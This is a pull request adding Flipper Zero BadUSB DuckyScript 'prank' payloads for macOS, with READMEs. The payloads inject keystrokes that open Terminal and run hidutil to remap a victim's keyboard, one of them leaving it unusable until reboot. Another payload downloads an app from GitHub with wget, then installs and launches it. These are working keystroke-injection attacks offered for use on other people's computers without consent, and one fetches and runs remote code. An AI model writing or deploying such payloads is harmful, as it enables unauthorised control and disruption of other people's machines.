### PR TITLE
Key Mapper and Mac Deactivate

### DIFF
--- a/prank/Unix-like/Osx/Key-mapper/readme.md
+++ b/prank/Unix-like/Osx/Key-mapper/readme.md
@@ -1,0 +1,70 @@
+# MAC OS Key Remapper
+
+What better way to piss someone off then to remap some keys. This script uses the built in hidutil to modify the plist file to remap whatever keys you like.
+
+I have the `STRING` running the command as a single line which seems to work well. Here below is the expanded command which you can add whatever keys you like:
+
+``` hidutil property --set '{"UserKeyMapping":
+    [
+            {
+              "HIDKeyboardModifierMappingSrc": 0x700000004,
+              "HIDKeyboardModifierMappingDst": 0x700000016
+            },
+            {
+              "HIDKeyboardModifierMappingSrc": 0x700000016,
+              "HIDKeyboardModifierMappingDst": 0x700000004
+            }
+        ]
+}'
+```
+and of course, here is how to undo it:
+
+``` ~  hidutil property --set '{"UserKeyMapping":                ok | system node
+    [
+            {
+              "HIDKeyboardModifierMappingSrc": 0x700000004,
+              "HIDKeyboardModifierMappingDst": 0x700000004
+            },
+            {
+              "HIDKeyboardModifierMappingSrc": 0x700000016,
+              "HIDKeyboardModifierMappingDst": 0x700000016
+            }
+        ]
+}'
+```
+
+**NOW WITH MORE ASS**
+
+I've now included a script to remap the left half of the keyboard to A and the right to S.
+
+**DVORAK MODE**
+
+If you really wanted to be a jerk, you could remap every key to dvorak layout which I provide! 
+
+See below in the references for the Hex for each key to create your own layout.
+
+<br>
+<br>
+<br>
+
+**Note:** 
+
+**This does revert on restart so if you get a real bind, you can restart and get back to normal.**
+
+Also, this command below reverts it, BUT remember that duckyscripts act as a keyboard. So if you go to type this after, it will be in whatever keyboard layout you remapped the keys to. ***So that's fun.***
+```
+hidutil property --set '{"UserKeyMapping":[]}'
+```
+
+**NEW**
+
+- Now includes a revert script for Dvorak in Dvorak so you can undo. 
+- For the AS script, you will have to reboot to fix.
+
+<br>
+<br>
+
+## References
+https://developer.apple.com/library/archive/technotes/tn2450/_index.html
+
+https://hidutil-generator.netlify.app/ - Special thanks [amarsyla](https://github.com/amarsyla/hidutil-key-remapping-generator) for the quick easy mode for generating the json.

--- a/prank/Unix-like/Osx/Key-mapper/remap.ass.txt
+++ b/prank/Unix-like/Osx/Key-mapper/remap.ass.txt
@@ -1,0 +1,18 @@
+REM       MacOS-AS-REMAP
+REM       Version 1.0
+REM       OS: macOS 10.4 - (Present)
+REM       Author: NateW
+REM       Requirements: Any DuckyScript Capable Device. In my case, I am building for a FlipperZero.
+REM       Description: Launches terminal, uses hidutil to remap All keys from Q-T, A-G, Z-B to A and Y-\, H-', N-/ to S.
+DELAY 200
+GUI SPACE
+DELAY 500
+STRING Terminal
+DELAY 700
+ENTER
+DELAY 700
+STRING hidutil property --set '{"UserKeyMapping":[{"HIDKeyboardModifierMappingSrc": 0x700000014,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x70000001A,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000008,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000015,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000017,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000004,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000016,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000007,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000009,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x70000000A,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x70000001D,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x70000001B,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000006,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000019,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x700000005,"HIDKeyboardModifierMappingDst": 0x700000004},{"HIDKeyboardModifierMappingSrc": 0x70000001C,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000018,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000000C,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000012,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000013,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000000B,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000000D,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000000E,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000000F,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000011,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000010,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000036,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x70000002F,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000030,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000031,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000037,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000038,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000033,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000034,"HIDKeyboardModifierMappingDst": 0x700000016}]}'
+DELAY 2000
+ENTER
+#DELAY 1000
+#GUI q - GUI q doesn't work because all the keys got remapped! lol

--- a/prank/Unix-like/Osx/Key-mapper/remap.dvorak-revert.txt
+++ b/prank/Unix-like/Osx/Key-mapper/remap.dvorak-revert.txt
@@ -1,0 +1,18 @@
+REM       MacOS-REMAP.DVORAK-REVERT
+REM       Version 1.0
+REM       OS: macOS 10.4 - (Present)
+REM       Author: NateW
+REM       Requirements: Any DuckyScript Capable Device. In my case, I am building for a FlipperZero.
+REM       Description: Fun and games are over, Launches terminal, uses hidutil revert the dvorak key mapping.
+DELAY 200
+GUI SPACE
+DELAY 500
+STRING Kdomglap
+DELAY 700
+ENTER
+DELAY 700
+STRING jghfkgp rosrdokt '';dk q_QF;doVdtMarrgluQZ-=+q
+DELAY 700
+ENTER
+DELAY 700
+GUI q

--- a/prank/Unix-like/Osx/Key-mapper/remap.dvorak.txt
+++ b/prank/Unix-like/Osx/Key-mapper/remap.dvorak.txt
@@ -1,0 +1,33 @@
+REM       MacOS-REMAP.DVORAK
+REM       Version 1.0
+REM       OS: macOS 10.4 - (Present)
+REM       Author: NateW
+REM       Requirements: Any DuckyScript Capable Device. In my case, I am building for a FlipperZero.
+REM       Description: Launches terminal, uses hidutil to remap All keys to the Dvorak layout.
+REM       More Instructions and Revert Script https://github.com/nwhistler/flipper-tools/tree/master/badusb/MacOS/key-remap
+DELAY 200
+GUI SPACE
+DELAY 500
+STRING Terminal
+DELAY 700
+ENTER
+DELAY 700
+STRING hidutil property --set '{"UserKeyMapping":[{"HIDKeyboardModifierMappingSrc": 0x70000002D,"HIDKeyboardModifierMappingDst": 0x70000002F},{"HIDKeyboardModifierMappingSrc": 0x70000002E,
+STRING "HIDKeyboardModifierMappingDst": 0x700000030},{"HIDKeyboardModifierMappingSrc": 0x700000014,"HIDKeyboardModifierMappingDst": 0x700000034},{"HIDKeyboardModifierMappingSrc": 0x70000001A,
+STRING "HIDKeyboardModifierMappingDst": 0x700000036},{"HIDKeyboardModifierMappingSrc": 0x700000008,"HIDKeyboardModifierMappingDst": 0x700000037},{"HIDKeyboardModifierMappingSrc": 0x700000015,
+STRING "HIDKeyboardModifierMappingDst": 0x700000013},{"HIDKeyboardModifierMappingSrc": 0x700000017,"HIDKeyboardModifierMappingDst": 0x70000001C},{"HIDKeyboardModifierMappingSrc": 0x70000001C,
+STRING "HIDKeyboardModifierMappingDst": 0x700000009},{"HIDKeyboardModifierMappingSrc": 0x700000018,"HIDKeyboardModifierMappingDst": 0x70000000A},{"HIDKeyboardModifierMappingSrc": 0x70000000C,
+STRING "HIDKeyboardModifierMappingDst": 0x700000006},{"HIDKeyboardModifierMappingSrc": 0x700000012,"HIDKeyboardModifierMappingDst": 0x700000015},{"HIDKeyboardModifierMappingSrc": 0x700000013,
+STRING "HIDKeyboardModifierMappingDst": 0x70000000F},{"HIDKeyboardModifierMappingSrc": 0x70000002F,"HIDKeyboardModifierMappingDst": 0x700000038},{"HIDKeyboardModifierMappingSrc": 0x700000030,
+STRING "HIDKeyboardModifierMappingDst": 0x70000002E},{"HIDKeyboardModifierMappingSrc": 0x700000016,"HIDKeyboardModifierMappingDst": 0x700000012},{"HIDKeyboardModifierMappingSrc": 0x700000007,
+STRING "HIDKeyboardModifierMappingDst": 0x700000008},{"HIDKeyboardModifierMappingSrc": 0x700000009,"HIDKeyboardModifierMappingDst": 0x700000018},{"HIDKeyboardModifierMappingSrc": 0x70000000A,
+STRING "HIDKeyboardModifierMappingDst": 0x70000000C},{"HIDKeyboardModifierMappingSrc": 0x70000000B,"HIDKeyboardModifierMappingDst": 0x700000007},{"HIDKeyboardModifierMappingSrc": 0x70000000D,
+STRING "HIDKeyboardModifierMappingDst": 0x70000000B},{"HIDKeyboardModifierMappingSrc": 0x70000000E,"HIDKeyboardModifierMappingDst": 0x700000017},{"HIDKeyboardModifierMappingSrc": 0x70000000F,
+STRING "HIDKeyboardModifierMappingDst": 0x700000011},{"HIDKeyboardModifierMappingSrc": 0x700000033,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000034,
+STRING "HIDKeyboardModifierMappingDst": 0x70000002D},{"HIDKeyboardModifierMappingSrc": 0x70000001D,"HIDKeyboardModifierMappingDst": 0x700000033},{"HIDKeyboardModifierMappingSrc": 0x70000001B,
+STRING "HIDKeyboardModifierMappingDst": 0x700000014},{"HIDKeyboardModifierMappingSrc": 0x700000006,"HIDKeyboardModifierMappingDst": 0x70000000D},{"HIDKeyboardModifierMappingSrc": 0x700000019,
+STRING "HIDKeyboardModifierMappingDst": 0x70000000E},{"HIDKeyboardModifierMappingSrc": 0x700000005,"HIDKeyboardModifierMappingDst": 0x70000001B},{"HIDKeyboardModifierMappingSrc": 0x700000011,
+STRING "HIDKeyboardModifierMappingDst": 0x700000005},{"HIDKeyboardModifierMappingSrc": 0x700000010,"HIDKeyboardModifierMappingDst": 0x700000010},{"HIDKeyboardModifierMappingSrc": 0x700000036,"HIDKeyboardModifierMappingDst": 0x70000001A},
+STRING {"HIDKeyboardModifierMappingSrc": 0x700000037,"HIDKeyboardModifierMappingDst": 0x700000019},{"HIDKeyboardModifierMappingSrc": 0x700000038,"HIDKeyboardModifierMappingDst": 0x70000001D}]}'
+DELAY 3500
+ENTER

--- a/prank/Unix-like/Osx/Key-mapper/remap.txt
+++ b/prank/Unix-like/Osx/Key-mapper/remap.txt
@@ -1,0 +1,18 @@
+REM       MacOS-AS-REMAP
+REM       Version 1.0
+REM       OS: macOS 10.4 - (Present)
+REM       Author: NateW
+REM       Requirements: Any DuckyScript Capable Device. In my case, I am building for a FlipperZero.
+REM       Description: Launches terminal, uses hidutil to remap A to S and S to A to be an ASS.
+DELAY 200
+GUI SPACE
+DELAY 500
+STRING Terminal
+DELAY 700
+ENTER
+DELAY 700
+STRING hidutil property --set '{"UserKeyMapping":[{"HIDKeyboardModifierMappingSrc": 0x700000004,"HIDKeyboardModifierMappingDst": 0x700000016},{"HIDKeyboardModifierMappingSrc": 0x700000016,"HIDKeyboardModifierMappingDst": 0x700000004}]}'
+DELAY 1500
+ENTER
+DELAY 700
+GUI q

--- a/prank/Unix-like/Osx/mac-deactivation/MacOS-Deactivate.txt
+++ b/prank/Unix-like/Osx/mac-deactivation/MacOS-Deactivate.txt
@@ -1,0 +1,18 @@
+REM       MacOS-DEACTIVATE-PRANK
+REM       Version 1.0
+REM       OS: macOS 10.4 - (Present)
+REM       Author: NateW
+REM       Requirements: Any DuckyScript Capable Device. In my case, I am building for a FlipperZero.
+REM       Description: Downloads Activate.app from https://github.com/Lakr233/ActivateMac and runs it. This will deactivate your Mac. This is a prank. I am not responsible for any damage caused by this script.
+DELAY 200
+GUI SPACE
+DELAY 500
+STRING Terminal
+DELAY 500
+ENTER
+DELAY 700
+STRING wget https://github.com/Lakr233/ActivateMac/releases/latest/download/Activate.zip && unzip Activate.zip && rm Activate.zip && mv Activate.app /Applications && open /Applications/Activate.app
+DELAY 700
+ENTER
+DELAY 1200
+GUI q

--- a/prank/Unix-like/Osx/mac-deactivation/readme.md
+++ b/prank/Unix-like/Osx/mac-deactivation/readme.md
@@ -1,0 +1,9 @@
+# MacOS Deactivation
+
+This is a fun prank to mimic when a Windows machine is not activated and has a message in the bottom right-hand corner.
+
+It downloads Activate.app from https://github.com/Lakr233/ActivateMac, unzip's it, deletes the zip file (cleanliness is next to godliness), moves it to the Applications folder and runs it.
+
+![](https://github.com/nwhistler/flipper-tools/blob/master/badusb/MacOS/images/activate-macos.png)
+
+Special thanks to [@FalsePhilosopher](https://github.com/FalsePhilosopher) for the idea and [Lakr233](https://github.com/Lakr233/ActivateMac) for the use of the binary.


### PR DESCRIPTION
Added key mapper with options and mac deactivate. I've included the Dvorak-revert because it needed to be done IN Dvorak. The file to map half the keyboard to A and the other half to S... there is no revert for that other than restarting.

A restart will reset the key mapping back to normal.

